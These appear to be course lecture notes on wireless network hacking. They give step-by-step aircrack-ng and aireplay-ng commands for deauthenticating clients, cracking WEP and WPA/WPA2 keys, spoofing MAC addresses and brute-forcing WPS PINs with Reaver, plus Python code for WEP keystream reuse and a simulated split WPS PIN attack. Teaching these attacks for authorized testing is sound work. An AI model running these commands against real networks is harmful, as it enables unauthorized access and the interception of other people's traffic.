Unit 5

The document discusses wireless networks, their setup, and the vulnerabilities associated with them, particularly focusing on wireless hacking techniques. It outlines the requirements for hacking, various tools like Aircrack-ng, and methods for cracking WEP and WPA/WPA2 networks. Additionally, it covers the importance of ethical hacking and the use of tools to bypass security measures such as MAC filtering and WPS pins.


UNIT-5

Wireless hacking


Wireless network
 A wireless network is a set of two or more devices connected with each other via radio waves within a limited range.
 Wireless networks are widely used and are quite easy to set up. They use the IEEE 802.11 family of standards.
 A wireless router is the most important device in a wireless network; it connects the users with the Internet.
 In a wireless network we also have access points, which extend the wireless range and behave as logical switches.
 As wireless networks communicate through radio waves, an attacker can sniff the network from a nearby location without ever connecting to it.
 Most attackers use network sniffing to find the service set identifier (SSID) and the other network parameters before attacking a wireless network.

Wireless hacking requirements
 Wireless access point
 Wireless adapter supporting packet injection
 The access point is required because we must not attack a neighbor's access point: it would be unethical (and illegal without authorization), and as a penetration tester or an ethical hacker you should make sure that you only test networks you are authorized to test.
 The second and most important requirement is a wireless adapter that supports packet injection and is also able to sniff in monitor mode.
 E.g. the Alfa AWUS036H wireless adapter (Realtek RTL8187 chipset): it not only supports packet injection, but BackTrack also ships with its drivers preinstalled, so we do not have to do the tedious job of downloading and installing them.
 Once you have an Alfa adapter that supports packet injection and has all drivers installed, connect it to your computer. Since we are running BackTrack in a virtual machine, we need to attach the adapter to the BackTrack VM.
 This can be done by going to VM → Removable Devices → Realtek RTL8187_Wireless and clicking the "Connect (Disconnect from host)" option.
 Next, we execute the "iwconfig" command to confirm that our BackTrack machine has detected the wireless network adapter.
 We could use the WICD network manager (Applications → Internet → Wicd Network Manager) to list the available wireless networks.
 Once we have connected to the appropriate access point and executed "iwconfig", we will see that the wlan0 interface shows information such as the ESSID, the access point's MAC address and the frequency.
Wi-Fi hacking tools
1. Aircrack-ng
2. Reaver
3. Pixiewps
4. Wifite
5. Wireshark
6. oclHashcat
7. Fern Wifi Cracker
8. Wash
9. Kismet
10. WEPCrack
Aircrack-ng
 Aircrack-ng is one of the most popular tools for WEP/WPA/WPA2 cracking.
 The Aircrack-ng suite contains tools to capture packets and handshakes, to de-authenticate connected clients and generate traffic, and tools to perform brute-force and dictionary attacks.
 Aircrack-ng is an all-in-one suite containing the following tools:
– aircrack-ng for wireless key cracking
– aireplay-ng to generate traffic and de-authenticate clients
– airodump-ng for packet capturing
– airbase-ng to configure fake access points
– airmon-ng to put the wireless interface into monitor mode
The most commonly used ones are airmon-ng, airodump-ng and aireplay-ng.


iwconfig command
 On Linux, the iwconfig command configures a wireless network interface.
 It is used to set the parameters of the network interface that are particular to wireless operation, such as the SSID, the frequency/channel and the mode.
 Parameter examples:
 essid: set the ESSID (or network name; in some products it may also be called the Domain ID).
 nwid: set the Network ID.
 nick: set the nickname, or station name.
 mode: set the operating mode of the device, which depends on the network topology (e.g. Managed, Ad-Hoc, Monitor).
Turning on monitor mode
 To sniff wireless networks, we need to make sure that our network card is in monitor mode.
 When a wireless card is switched into a sniffing mode in which it receives every frame on the channel without associating to an access point, it is said to be in monitor mode.
 We can use the following command to change the network card to monitor mode:
 $ airmon-ng start wlan0
 airmon-ng creates a new monitor-mode interface (mon0 on BackTrack; newer Aircrack-ng releases name it wlan0mon), and that interface is the one used in all the following steps.


Uncovering hidden SSIDs
 It is common practice for network administrators to disable SSID broadcasting.
 Normally the SSID is sent in beacon frames, but when an administrator hides the SSID the beacons carry an empty SSID element instead.
 Whenever a client (re)associates with the access point, it sends the SSID in plain text in its probe and association requests, which reveals the real SSID.
 So we have two methods to recover it:
 the first is to keep capturing and wait for a client to disconnect and reconnect to the access point;
 the second is to send deauthentication frames (a deauthentication attack), which forces every client on the network to disconnect and reconnect to the access point, revealing the SSID to us.
Steps for Wi-Fi (WPA/WPA2) hacking
 The attacker first configures his/her own network interface card: it is set to monitor mode and must be capable of packet injection.
 The properly configured network interface card is then used to perform a de-authentication attack.
 The de-authenticated client reconnects to the access point.
 This allows us to capture the four-way handshake.
 We then perform a brute-force or dictionary attack on the captured handshake.
 Once the attack succeeds we have recovered the pre-shared key (the Wi-Fi password). Nothing is "decrypted": each candidate passphrase is run through the key derivation and checked against the MIC in the captured handshake.
Monitoring beacon frames in Wireshark
 Now that monitor mode is enabled, we sniff on the mon0 interface in Wireshark, which shows us the beacon frames containing the SSIDs being broadcast.
 If the SSID is not broadcast, it will not show up in the beacons (the SSID element is present but empty).
 Whenever a client authenticates against the access point with the hidden SSID, it sends the SSID in its probe/association request; therefore we can easily figure out what the real SSID is (in Wireshark, the display filter wlan.fc.type_subtype == 0x0000 shows association requests).
Monitoring with airodump-ng
 The easier way is to use airodump-ng to start monitoring the traffic; as soon as a client associates, the SSID is revealed (airodump-ng lists a hidden network as "<length: N>" until it sees the real name).
 # airodump-ng mon0
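The mechanism behind both the Wireshark and the airodump-ng approach is the SSID element (element ID 0) in 802.11 management frames: a "hidden" network still beacons, but with a zero-length SSID element, while the client's association or probe request carries the name in the clear. The parser below is an added example, not code from the slides; the frames it parses are constructed by hand, and the BSSID 98:FC:11:C9:14:22 is only reused from the page as sample data.

```python
"""Extract the SSID element from 802.11 management frames (added example).

Shows why a hidden SSID is hidden only in beacons: the beacon carries an empty
SSID element, while the next association/probe request carries the real name.
All frames below are constructed in build_mgmt(); nothing is captured.
"""

# Management-frame subtypes (IEEE 802.11 frame control, frame type 0)
SUBTYPE_ASSOC_REQ = 0x0
SUBTYPE_PROBE_REQ = 0x4
SUBTYPE_PROBE_RESP = 0x5
SUBTYPE_BEACON = 0x8

# Bytes of fixed parameters that precede the tagged elements, per subtype
FIXED_PARAMS = {
    SUBTYPE_ASSOC_REQ: 4,    # capability(2) + listen interval(2)
    SUBTYPE_PROBE_REQ: 0,
    SUBTYPE_PROBE_RESP: 12,  # timestamp(8) + beacon interval(2) + capability(2)
    SUBTYPE_BEACON: 12,
}
MAC_HDR_LEN = 24  # frame control(2) duration(2) addr1/2/3(18) sequence(2)


def parse_ssid(frame: bytes):
    """Return (subtype, ssid). ssid is None when the element is absent or
    zero-length, which is exactly the 'hidden SSID' beacon case."""
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0 or subtype not in FIXED_PARAMS:
        return subtype, None
    pos = MAC_HDR_LEN + FIXED_PARAMS[subtype]
    while pos + 2 <= len(frame):            # walk the tagged parameters
        tag, length = frame[pos], frame[pos + 1]
        body = frame[pos + 2:pos + 2 + length]
        if tag == 0:                        # element ID 0 = SSID
            return subtype, body.decode("utf-8", "replace") if length else None
        pos += 2 + length
    return subtype, None


def build_mgmt(subtype: int, ssid: bytes) -> bytes:
    """Construct a minimal management frame carrying only an SSID element."""
    bssid = bytes.fromhex("98fc11c91422")   # sample BSSID from the page
    fc = bytes([subtype << 4, 0])           # version 0, type 0 (management)
    hdr = fc + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = b"\x00" * FIXED_PARAMS[subtype]
    return hdr + fixed + bytes([0, len(ssid)]) + ssid


def recover_hidden_ssid(frames):
    """What airodump-ng does for a hidden network: ignore the empty beacon SSID
    and take the first non-empty SSID from any later management frame."""
    for f in frames:
        subtype, ssid = parse_ssid(f)
        if ssid:
            return subtype, ssid
    return None, None


if __name__ == "__main__":
    beacon = build_mgmt(SUBTYPE_BEACON, b"")            # hidden network
    assoc = build_mgmt(SUBTYPE_ASSOC_REQ, b"Linksys")   # client reconnects
    print(parse_ssid(beacon))                           # (8, None)
    print(recover_hidden_ssid([beacon, beacon, assoc])) # (0, 'Linksys')
```

A real capture would feed raw frames from a pcap into the same parse_ssid(); the radiotap header that monitor-mode captures prepend would have to be stripped first.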
Cracking a WEP wireless network with Aircrack-ng
 WEP (Wired Equivalent Privacy) was one of the first authentication and encryption schemes used for wireless networks.
 We will use aircrack-ng to demonstrate how easy it is to crack a WEP key.
 Placing your wireless adapter in monitor mode
 Step 1: First, we need to make sure that our network card is in monitor mode; we have already learnt that the "airmon-ng start wlan0" command accomplishes this.
 Determining the target with airodump-ng
 Step 2: Next, we use airodump-ng to discover the neighboring networks with WEP encryption enabled.
 We can see our target with an ESSID (same as SSID) of "Linksys" and a BSSID of 98:FC:11:C9:14:22 on channel 6. We should note the ESSID, BSSID and channel because we will need them in the following steps.
 Attacking the target
 Step 3: In order to crack the WEP key, we need to capture the data frames of the target network and write them to a file.
 Structure:
 airodump-ng --bssid (bssid of target) -c (channel) -w (file name to save) (interface)
 Command:
 airodump-ng --bssid 98:fc:11:c9:14:22 --channel 6 --write RHAWEP mon0
 Speeding up the cracking process
 Step 4: To recover the WEP key we need data packets, but waiting to collect enough of them would be time consuming. To speed this up, we first use a fake authentication attack, which associates our MAC address with the access point so that it accepts injected frames from us.
 Structure:
 aireplay-ng -1 (reassociation delay in seconds) -a (bssid of target) (interface)
 Command:
 aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
 Injecting ARP packets
 Step 5: The success of the attack depends on the number of initialization vectors (IVs) we gather. A fake authentication attack does not generate ARP packets by itself, so we use attack number 3, "ARP request replay", which is the most effective way of generating new IVs: it captures an ARP request and retransmits it over and over, and the access point re-encrypts each relayed request (and the reply it triggers) under a fresh IV.
 Structure:
 aireplay-ng -3 -b (bssid of target) -h (MAC address of mon0) (interface)
 Command:
 aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
 Cracking the WEP key
 Step 6: Finally, it is time to recover the key from the captured file RHAWEP-01.cap (airodump-ng appends a sequence number to the prefix given with -w). We use aircrack-ng for this.
 Command:
 aircrack-ng RHAWEP-01.cap
Key found
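Why the IV count matters, and why replaying ARP requests in particular helps, comes from how WEP keys RC4: the 24-bit IV is prepended to the shared key and sent in the clear, so the keystream for a given IV is fixed and repeats once the IV space is exhausted, and the plaintext of an ARP request is almost entirely predictable. The following is an added example (not from the slides) that implements WEP's per-packet keying and the resulting keystream-reuse attack; the key, IV, IP addresses and frames are constructed, and the MAC 00:c0:ca:50:f8:32 is only reused from the page as sample data.

```python
"""WEP per-packet keying and keystream reuse (added example, constructed data).

WEP seeds RC4 with IV(3 bytes) || key and transmits the IV in the clear, then
XORs the keystream over plaintext || CRC32 ICV. Two frames under the same IV
share a keystream, so one known plaintext (an ARP request) reads the other.
"""
import struct
import zlib

IV_SPACE = 2 ** 24  # only 16.7M IVs: a busy network repeats them within hours

# Constructed WEP-encapsulated ARP request: LLC/SNAP + 28-byte ARP body.
ARP_REQUEST = (bytes.fromhex("aaaa030000000806")            # LLC/SNAP, EtherType ARP
               + bytes.fromhex("0001080006040001")          # Ethernet/IPv4, opcode request
               + bytes.fromhex("00c0ca50f832") + bytes([192, 168, 1, 10])   # sender MAC/IP
               + b"\x00" * 6 + bytes([192, 168, 1, 1]))     # target MAC/IP


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the PRGA."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: unkeyed CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || RC4(IV || key) XOR (plaintext || ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    data = plaintext + wep_icv(plaintext)
    ks = rc4_keystream(iv + key, len(data))
    return iv + bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok) for a frame produced by wep_encrypt()."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + key, len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext, wep_icv(plaintext) == icv


def keystream_reuse_attack(known_frame: bytes, known_plaintext: bytes, target_frame: bytes) -> bytes:
    """Recover the keystream of an IV from a frame with known plaintext and use
    it to read another frame sent under the same IV. No key is needed."""
    if known_frame[:3] != target_frame[:3]:
        raise ValueError("frames use different IVs; keystreams do not match")
    known = known_plaintext + wep_icv(known_plaintext)
    keystream = bytes(c ^ p for c, p in zip(known_frame[3:], known))
    body = target_frame[3:]
    if len(body) > len(keystream):
        raise ValueError("known plaintext too short to cover the target frame")
    data = bytes(c ^ k for c, k in zip(body, keystream))
    return data[:-4]  # drop the ICV


if __name__ == "__main__":
    key = bytes.fromhex("0a0b0c0d0e")   # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"               # constructed IV, reused by both frames
    arp_frame = wep_encrypt(key, iv, ARP_REQUEST)
    secret_frame = wep_encrypt(key, iv, b"GET /admin HTTP/1.0")
    print(keystream_reuse_attack(arp_frame, ARP_REQUEST, secret_frame))
```

aircrack-ng goes further than this: with enough distinct IVs its statistical attack recovers the key itself, after which every frame can be decrypted, but the keystream reuse shown here is the reason the IV counter in airodump-ng is the number to watch.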
Cracking a WPA/WPA2 wireless network using Aircrack-ng
 WPA (Wi-Fi Protected Access) is a security protocol developed by the Wi-Fi Alliance in 2003 for securing wireless networks; it was designed to replace the WEP protocol.
 The WPA/WPA2 pre-shared key (passphrase) that we use to authenticate on a wireless network is not used directly: together with the SSID it is stretched into the Pairwise Master Key (PMK), from which a unique per-session key, the Pairwise Transient Key (PTK), is derived.
 Required parameters for the PTK derivation:
 SSID of the network (combined with the passphrase to produce the PMK)
 authenticator nonce (ANonce) and supplicant nonce (SNonce)
 authenticator MAC address (access point MAC)
 supplicant MAC address (Wi-Fi client MAC)
 These values are exchanged in the four-way handshake between the client and the access point. The handshake also carries a message integrity code (MIC) computed with the PTK, and that MIC is what an offline dictionary attack checks every candidate passphrase against.
 Step 1: First of all, ensure that your network card is in monitor mode.
 Step 2: Next, we listen on the mon0 interface for access points with encryption set to either WPA or WPA2.
 We use the "airodump-ng mon0" command to do it.
 We take a note of the target's BSSID and the channel it is on; this information is needed in the upcoming steps.
 BSSID: F4:3E:61:92:68:D7
 Channel: 1
 Capturing packets
 Step 3: Next, we save the traffic of our access point to a file. The inputs we need to specify are the channel, the BSSID and the file name prefix to write to.
 Command:
 airodump-ng -c 1 -w rhawap --bssid F4:3E:61:92:68:D7 mon0
 -w: file prefix to write
 -c: channel (must match the channel noted in Step 2)
 Capturing the four-way handshake
 Step 4: In order to crack WPA, we need to capture the four-way handshake. As mentioned, we can use a deauthentication attack to force clients to disconnect and reconnect with the access point. The -c parameter here is the MAC address of a client currently connected to the access point (taken from the station list in airodump-ng), not the MAC of our own interface; without -c, aireplay-ng sends broadcast deauthentication frames to all clients.
 Structure:
 aireplay-ng --deauth 10 -a (target AP BSSID) -c (client MAC address) mon0
 Command: aireplay-ng --deauth 10 -a F4:3E:61:92:68:D7 -c 94:39:E5:EA:85:31 mon0
 airodump-ng prints "WPA handshake: F4:3E:61:92:68:D7" in its top line once the handshake has been captured.
 Cracking WPA/WPA2
 Structure:
 aircrack-ng -w (wordlist) (capture_file).cap
 Command:
 aircrack-ng rhawap-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
Bypassing MAC filters on a wireless network
 It is also common practice for network administrators to apply MAC filtering on the access point so that only whitelisted MAC addresses are able to connect to it.
 MAC filtering, like hiding the SSID, is a low-level control rather than real security, because MAC addresses are sent in the clear in every frame:
 an attacker can spoof a legitimate client's MAC address to connect to the access point. Here is how the attack is carried out:
 1. The attacker scans the access point for the hosts that are already connected to it.
 2. Next, the attacker notes down the MAC address of a legitimate client that is connected to the access point, spoofs that MAC address to get onto the whitelist, and is then able to connect to and use the access point.
 Step 1: The first command we use is "airodump-ng" to scan for all the neighboring networks.
 Step 2: The next step is to find a client that is already associated with the access point. We use airodump-ng to find it for us.
 Command: airodump-ng -c 1 -a --bssid F4:3E:61:9C:77:3B mon0
 Since the access point is on channel 1, we type -c 1; the -a parameter restricts the station list to clients that are currently associated with the access point.
 Step 3: The final step is to spoof our MAC address and change it to one of the client's. We can use a neat program in BackTrack called macchanger. The interface must be brought down before the address is changed (ifconfig wlan0 down, then macchanger, then ifconfig wlan0 up), and two stations using the same MAC at the same time disrupt each other, so this works best once the legitimate client has left the network.
 We use the following command to spoof our current MAC address:
 macchanger -m B0:D0:9C:5C:EF:86 wlan0
Using Reaver to crack WPS-enabled wireless networks
 Reaver is the penetration tester's tool of choice against WPS; it can recover WPA/WPA2 keys within a matter of hours.
 Reaver does not directly perform a brute-force attack against the WPA/WPA2 key; it brute-forces the WPS PIN, and the router then hands the WPA passphrase to whoever presents a correct PIN.
 WPS PINs are eight digits long, but the last digit is a checksum and the protocol verifies the PIN in two halves (the first four digits, then the remaining three), so at most about 11,000 guesses are needed instead of 10^8. In addition, many routers ship with a default PIN, so they are easily compromised.
 Step 1: Make sure that your wireless card is in monitor mode.
 Step 2: Next, we use airodump-ng (or wash, which lists only WPS-enabled access points) to select the target we want to attack.
In this case we target the access point with ESSID PTCL-BB and BSSID F4:3E:61:F5:FC:49. We copy the BSSID, since this is the only target input required for reaver to work.
 Step 3: Now we use reaver to attack our access point. The command is as follows:
 reaver -i mon0 -b F4:3E:61:F5:FC:49 -vv
 The -i parameter specifies the interface, mon0, followed by the -b parameter used to define the BSSID, and -vv sets the verbosity. Verbosity is set to twice, which means reaver displays each PIN as it is tried against the access point.
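The reason Reaver finishes in hours rather than years is the structure of the PIN, which is worth seeing in code. The following is an added example, not Reaver code: it implements the WPS PIN checksum and a simulated registrar that, like the real WPS M4/M6 exchange, rejects the first and second half of the PIN separately, then runs the split brute force against it. The registrar class and the PIN 12345670 are constructed for the demo; real WPS runs over EAP and rate-limits on many devices.

```python
"""WPS PIN checksum and split brute force (added example, simulated registrar)."""

MAX_ATTEMPTS = 10 ** 4 + 10 ** 3   # first half (4 digits) + second half (3 digits)


def wps_checksum(first7: int) -> int:
    """Checksum digit of an 8-digit WPS PIN, computed over its first seven digits
    (alternating weights 3 and 1 from the right, modulo 10)."""
    acc = 0
    while first7:
        acc += 3 * (first7 % 10)
        first7 //= 10
        acc += first7 % 10
        first7 //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """Only 10^7 of the 10^8 eight-digit strings pass the checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedRegistrar:
    """Stand-in for the access point's WPS registrar (constructed, not real WPS).

    WPS proves the PIN halves in separate messages: a wrong first half is
    rejected at M4, a wrong second half at M6. That leak is the whole attack."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("registrar PIN must carry a valid checksum")
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "M4 NACK"      # first half wrong
        if pin[4:] != self.pin[4:]:
            return "M6 NACK"      # second half wrong
        return "M7"               # real registrar returns the WPA passphrase here


def reaver_style_attack(registrar: SimulatedRegistrar):
    """Brute-force the halves independently: at most 10^4 + 10^3 attempts.
    Returns the recovered PIN or None."""
    first = None
    for p1 in range(10_000):
        if registrar.try_pin(f"{p1:04d}0000") != "M4 NACK":
            first = p1                      # first half accepted
            break
    if first is None:
        return None
    for p2 in range(1_000):
        first7 = first * 1000 + p2
        pin = f"{first7:07d}{wps_checksum(first7)}"   # only checksum-valid PINs
        if registrar.try_pin(pin) == "M7":
            return pin
    return None


if __name__ == "__main__":
    reg = SimulatedRegistrar("12345670")    # a common default PIN (constructed target)
    print(reaver_style_attack(reg), reg.attempts, "attempts out of at most", MAX_ATTEMPTS)
```

The defence follows directly: disable WPS, or use a device that locks the registrar after a few failed PIN attempts, since the protocol itself cannot be repaired by choosing a better PIN.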
Wi-Fi security protocols
 Wi-Fi security protocols use encryption to secure networks and protect the data of their clients.
 Wireless networks are often less secure than wired ones, because anyone within radio range can receive the traffic, so wireless security protocols are crucial for keeping you safe.
 The most common Wi-Fi security protocols today are WEP, WPA and WPA2:
 Wired Equivalent Privacy (WEP)
 Wi-Fi Protected Access (WPA)
 Wi-Fi Protected Access 2 (WPA2)
 WEP (Wired Equivalent Privacy) is the oldest Wi-Fi security protocol and is still found on legacy equipment.
 It was the privacy component of the original IEEE 802.11 standard, a set of technical standards that aimed to provide a wireless local area network (WLAN) with a level of security comparable to a wired local area network (LAN).
 WPA (Wi-Fi Protected Access) is a wireless security protocol released in 2003 to address the growing vulnerabilities of its predecessor, WEP.
 WPA is more secure than WEP because it derives a 256-bit pairwise master key and per-packet keys from the passphrase, a major upgrade from the fixed 64-bit and 128-bit keys used by WEP.
 WPA uses the Temporal Key Integrity Protocol (TKIP), which mixes a fresh key for every packet (still using RC4 underneath) and adds a keyed message integrity check. TKIP is much more secure than the fixed-key system used by WEP, but it was designed as a stopgap that WEP-era hardware could still run.
 WPA2 (Wi-Fi Protected Access 2) is the second generation of the Wi-Fi Protected Access wireless security protocol, based on IEEE 802.11i. Like its predecessor, WPA2 was designed to secure and protect Wi-Fi networks.
 WPA2 ensures that data sent or received over your wireless network is encrypted, and only people with your network password have access to it.
 A benefit of WPA2 was that it introduced the Advanced Encryption Standard (AES), in the CCMP mode, to replace the more vulnerable TKIP used in the original WPA protocol.
WEP vs WPA vs WPA2:

                       WEP                       WPA                          WPA2
Year introduced        1999                      2003                         2004
Encryption protocol    Fixed key                 TKIP                         CCMP
Session key size       64-bit/128-bit            256-bit                      256-bit
Cipher type            RC4 stream cipher         TKIP (RC4-based)             AES
Data integrity         Cyclic Redundancy Check   Message Integrity Check      CCMP
Authentication method  Open system/Shared key    PSK (pre-shared key)         PSK + PMK (pairwise master key)
